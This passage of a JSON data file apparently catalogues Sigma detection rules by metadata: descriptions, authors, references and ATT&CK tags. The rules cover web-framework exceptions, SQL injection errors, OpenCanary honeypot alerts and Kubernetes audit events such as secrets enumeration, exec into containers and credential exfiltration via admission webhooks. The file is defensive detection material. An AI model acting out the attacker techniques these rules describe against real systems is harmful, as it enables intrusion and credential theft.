"attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", "value": "Ruby on Rails Framework Exceptions" }, { "description": "Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Application bugs", "Missing .vm files" ], "filename": "velocity_ssti_injection.yml", "level": "high", "logsource.category": "application", "logsource.product": "velocity", "refs": [ "https://antgarsil.github.io/posts/velocity/", "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/velocity/velocity_ssti_injection.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16c86189-b556-4ee8-b4c7-7e350a195a4f", "value": "Potential Server Side Template Injection In Velocity" }, { "description": "Detects SQL error messages that indicate probing for an injection attack", "meta": { "author": "Bjoern Kimminich", "creation_date": "2017-11-27", "falsepositive": [ "A syntax error in MySQL also occurs in non-dynamic (safe) queries if there is an empty in() clause, that may often be the case." ], "filename": "app_sqlinjection_errors.yml", "level": "high", "logsource.category": "application", "logsource.product": "sql", "refs": [ "http://www.sqlinjection.net/errors", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/sql/app_sqlinjection_errors.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8a670c6d-7189-4b1c-8017-a417ca84a086", "value": "Suspicious SQL Error Messages" }, { "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", "meta": { "author": "Thomas Patzke", "creation_date": "2017-08-05", "falsepositive": [ "Application bugs" ], "filename": "appframework_django_exceptions.yml", "level": "medium", "logsource.category": "application", "logsource.product": "django", "refs": [ "https://docs.djangoproject.com/en/1.11/topics/logging/#django-security", "https://docs.djangoproject.com/en/1.11/ref/exceptions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/django/appframework_django_exceptions.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fd435618-981e-4a7c-81f8-f78ce480d616", "value": "Django Framework Exceptions" }, { "description": "Detects process execution related errors in NodeJS. If the exceptions are caused due to user input then they may suggest an RCE vulnerability.", "meta": { "author": "Moti Harmats", "creation_date": "2023-02-11", "falsepositive": [ "Puppeteer invocation exceptions often contain child_process related errors, that doesn't necessarily mean that the app is vulnerable." ], "filename": "nodejs_rce_exploitation_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "nodejs", "refs": [ "https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/nodejs/nodejs_rce_exploitation_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97661d9d-2beb-4630-b423-68985291a8af", "value": "Potential RCE Exploitation Attempt In NodeJS" }, { "description": "Detects instances where an SMB service on an OpenCanary node has had a file open request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_smb_file_open.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_smb_file_open.yml" ], "tags": [ "attack.lateral-movement", "attack.collection", "attack.t1021", "attack.t1005" ] }, "related": [ { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "22777c9e-873a-4b49-855f-6072ab861a52", "value": "OpenCanary - SMB File Open Request" }, { "description": "Detects instances where a VNC service on an OpenCanary node has had a connection attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_vnc_connection_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_vnc_connection_attempt.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021" ] }, "related": [ { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9db5446c-b44a-4291-8b89-fcab5609c3b3", "value": "OpenCanary - VNC Connection Attempt" }, { "description": "Detects instances where an SSH service on an OpenCanary node has had a connection attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_ssh_new_connection.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_ssh_new_connection.yml" ], "tags": [ "attack.initial-access", "attack.lateral-movement", "attack.persistence", "attack.t1133", "attack.t1021", "attack.t1078" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd55f721-5623-4663-bd9b-5229cab5237d", "value": "OpenCanary - SSH New Connection Attempt" }, { "description": "Detects instances where a TFTP service on an OpenCanary node has had a request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_tftp_request.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_tftp_request.yml" ], "tags": [ "attack.exfiltration", "attack.t1041" ] }, "related": [ { "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b4e6b016-a2ac-4759-ad85-8000b300d61e", "value": "OpenCanary - TFTP Request" }, { "description": "Detects instances where an FTP service on an OpenCanary node has had a login attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_ftp_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_ftp_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.exfiltration", "attack.t1190", "attack.t1021" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6991bc2b-ae2e-447f-bc55-3a1ba04c14e5", "value": "OpenCanary - FTP Login Attempt" }, { "description": "Detects instances where an HTTPPROXY service on an OpenCanary node has had an attempt to proxy another page.\n", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_httpproxy_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_httpproxy_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.defense-evasion", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5498fc09-adc6-4804-b9d9-5cca1f0b8760", "value": "OpenCanary - HTTPPROXY Login Attempt" }, { "description": "Detects instances where an HTTP service on an OpenCanary node has had login attempt via Form POST.\n", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_http_post_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_http_post_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af1ac430-df6b-4b38-b976-0b52f07a0252", "value": "OpenCanary - HTTP POST Login Attempt" }, { "description": "Detects instances where a GIT service on an OpenCanary node has had Git Clone request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_git_clone_request.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_git_clone_request.yml" ], "tags": [ "attack.collection", "attack.t1213" ] }, "related": [ { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4fe17521-aef3-4e6a-9d6b-4a7c8de155a8", "value": "OpenCanary - GIT Clone Request" }, { "description": "Detects instances where an SNMP service on an OpenCanary node has had an OID request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_snmp_cmd.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_snmp_cmd.yml" ], "tags": [ "attack.discovery", "attack.lateral-movement", "attack.t1016", "attack.t1021" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9856028-fd4e-46e6-b3d1-10f7ceb95078", "value": "OpenCanary - SNMP OID Request" }, { "description": "Detects instances where an SIP service on an OpenCanary node has had a SIP request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_sip_request.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_sip_request.yml" ], "tags": [ "attack.collection", "attack.t1123" ] }, "related": [ { "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e30de276-68ec-435c-ab99-ef3befec6c61", "value": "OpenCanary - SIP Request" }, { "description": "Detects instances where an SSH service on an OpenCanary node has had a login attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_ssh_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_ssh_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.lateral-movement", "attack.persistence", "attack.t1133", "attack.t1021", "attack.t1078" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff7139bc-fdb1-4437-92f2-6afefe8884cb", "value": "OpenCanary - SSH Login Attempt" }, { "description": "Detects instances where a MySQL service on an OpenCanary node has had a login attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_mysql_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_mysql_login_attempt.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1003", "attack.t1213" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7d79a1b-25ed-4956-bd56-bd344fa8fd06", "value": "OpenCanary - MySQL Login Attempt" }, { "description": "Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_redis_command.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_redis_command.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1003", "attack.t1213" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "547dfc53-ebf6-4afe-8d2e-793d9574975d", "value": "OpenCanary - REDIS Action Command Attempt" }, { "description": "Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.\n", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_mssql_login_sqlauth.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_mssql_login_sqlauth.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1003", "attack.t1213" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ec9a16d-0b4f-4967-9542-ebf38ceac7dd", "value": "OpenCanary - MSSQL Login Attempt Via SQLAuth" }, { "description": "Detects instances where a Telnet service on an OpenCanary node has had a login attempt.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_telnet_login_attempt.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_telnet_login_attempt.yml" ], "tags": [ "attack.initial-access", "attack.command-and-control", "attack.t1133", "attack.t1078" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "512cff7a-683a-43ad-afe0-dd398e872f36", "value": "OpenCanary - Telnet Login Attempt" }, { "description": "Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.\n", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_mssql_login_winauth.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_mssql_login_winauth.yml" ], "tags": [ "attack.credential-access", "attack.collection", "attack.t1003", "attack.t1213" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e78f90f-0043-4a01-ac41-f97681613a66", "value": "OpenCanary - MSSQL Login Attempt Via Windows Authentication" }, { "description": "Detects instances where an HTTP service on an OpenCanary node has received a GET request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_http_get.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_http_get.yml" ], "tags": [ "attack.initial-access", "attack.t1190" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "af6c3078-84cd-4c68-8842-08b76bd81b13", "value": "OpenCanary - HTTP GET Request" }, { "description": "Detects instances where an NTP service on an OpenCanary node has had a NTP monlist request.", "meta": { "author": "Security Onion Solutions", "creation_date": "2024-03-08", "falsepositive": [ "Unlikely" ], "filename": "opencanary_ntp_monlist.yml", "level": "high", "logsource.category": "application", "logsource.product": "opencanary", "refs": [ "https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration", "https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/opencanary/opencanary_ntp_monlist.yml" ], "tags": [ "attack.impact", "attack.t1498" ] }, "related": [ { "dest-uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cded4b3-f09e-405a-b96f-24248433ba44", "value": "OpenCanary - NTP Monlist Request" }, { "description": "Detects enumeration of Kubernetes secrets.", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "The Kubernetes dashboard occasionally accesses the kubernetes-dashboard-key-holder secret" ], "filename": "kubernetes_audit_secrets_enumeration.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_secrets_enumeration.yml" ], "tags": [ "attack.t1552.007" ] }, "related": [ { "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eeb3e9e1-b685-44e4-9232-6bb701f925b5", "value": "Kubernetes Secrets Enumeration" }, { "description": "Detects when Kubernetes Secrets are Modified or Deleted.\n", "meta": { "author": "kelnage", "creation_date": "2024-07-11", "falsepositive": [ "Secrets being modified or deleted may be performed by a system administrator.", "Automated processes may need to take these actions and may need to be filtered." ], "filename": "kubernetes_audit_secrets_modified_or_deleted.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", "https://commandk.dev/blog/guide-to-audit-k8s-secrets-for-compliance/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_secrets_modified_or_deleted.yml" ], "tags": [ "attack.credential-access" ] }, "uuid": "58d31a75-a4f8-4c40-985b-373d58162ca2", "value": "Kubernetes Secrets Modified or Deleted" }, { "description": "Detects attempts to execute remote commands, within a Pod's container using e.g. the \"kubectl exec\" command.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Legitimate debugging activity. Investigate the identity performing the requests and their authorization." ], "filename": "kubernetes_audit_exec_into_container.yml", "level": "medium", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Exec%20into%20container/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_exec_into_container.yml" ], "tags": [ "attack.t1609" ] }, "related": [ { "dest-uuid": "7b50a1d3-4ca7-45d1-989d-a6503f04bfe1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a1b0ca4e-7835-413e-8471-3ff2b8a66be6", "value": "Potential Remote Command Execution In Pod Container" }, { "description": "Detects when a Kubernetes Rolebinding is created or modified.\n", "meta": { "author": "kelnage", "creation_date": "2024-07-11", "falsepositive": [ "Modifying a Kubernetes Rolebinding may need to be done by a system administrator.", "Automated processes may need to take these actions and may need to be filtered." ], "filename": "kubernetes_audit_rolebinding_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", "https://medium.com/@seifeddinerajhi/kubernetes-rbac-privilege-escalation-exploits-and-mitigations-26c07629eeab", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_rolebinding_modification.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "10b97915-ec8d-455f-a815-9a78926585f6", "value": "Kubernetes Rolebinding Modification" }, { "description": "Detects creation of new Kubernetes service account, which could indicate an attacker's attempt to persist within a cluster.\n", "meta": { "author": "Leo Tsaousis (@laripping)", "creation_date": "2024-03-26", "falsepositive": [ "Unknown" ], "filename": "kubernetes_audit_serviceaccount_creation.yml", "level": "low", "logsource.category": "application", "logsource.product": "kubernetes", "refs": [ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/container%20service%20account/", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_serviceaccount_creation.yml" ], "tags": [ "attack.t1136" ] }, "related": [ { "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e31bae15-83ed-473e-bf31-faf4f8a17d36", "value": "New Kubernetes Service Account Created" }, { "description": "Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.\n", "meta": { "author": "kelnage", "creation_date": "2024-07-11", "falsepositive": [ "Modifying the Kubernetes Admission Controller may need to be done by a system administrator.", "Automated processes may need to take these actions and may need to be filtered." ], "filename": "kubernetes_audit_change_admission_controller.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", "https://security.padok.fr/en/blog/kubernetes-webhook-attackers", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_change_admission_controller.yml" ], "tags": [ "attack.persistence", "attack.t1078", "attack.credential-access", "attack.t1552", "attack.t1552.007" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eed82177-38f5-4299-8a76-098d50d225ab", "value": "Kubernetes Admission Controller Modification" }, { "description": "Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used.\nThis may indicate an attacker attempting to leverage credentials they have obtained.\n", "meta": { "author": "kelnage", "creation_date": "2024-04-12", "falsepositive": [ "A misconfigured RBAC policy, a mistake by a valid user, or a wider issue with authentication tokens can also generate these errors." ], "filename": "kubernetes_audit_unauthorized_unauthenticated_actions.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", "https://www.datadoghq.com/blog/monitor-kubernetes-audit-logs/#monitor-api-authentication-issues", "https://github.com/SigmaHQ/sigma/tree/master/rules/application/kubernetes/audit/kubernetes_audit_unauthorized_unauthenticated_actions.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "0d933542-1f1f-420d-97d4-21b2c3c492d9", "value": "Kubernetes Unauthorized or Unauthenticated Access" }, { "description": "Detects when a Kubernetes CronJob or Job is created or modified.\nA Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule.\nAn adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.\n", "meta": { "author": "kelnage", "creation_date": "2024-07-11", "falsepositive": [ "Modifying a Kubernetes Job or CronJob may need to be done by a system administrator.", "Automated processes may need to take these actions and may need to be filtered." ], "filename": "kubernetes_audit_cronjob_modification.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "kubernetes", "refs": [ "https://kubernetes.io/docs/reference/config-api/apiserver-audit.v1/", 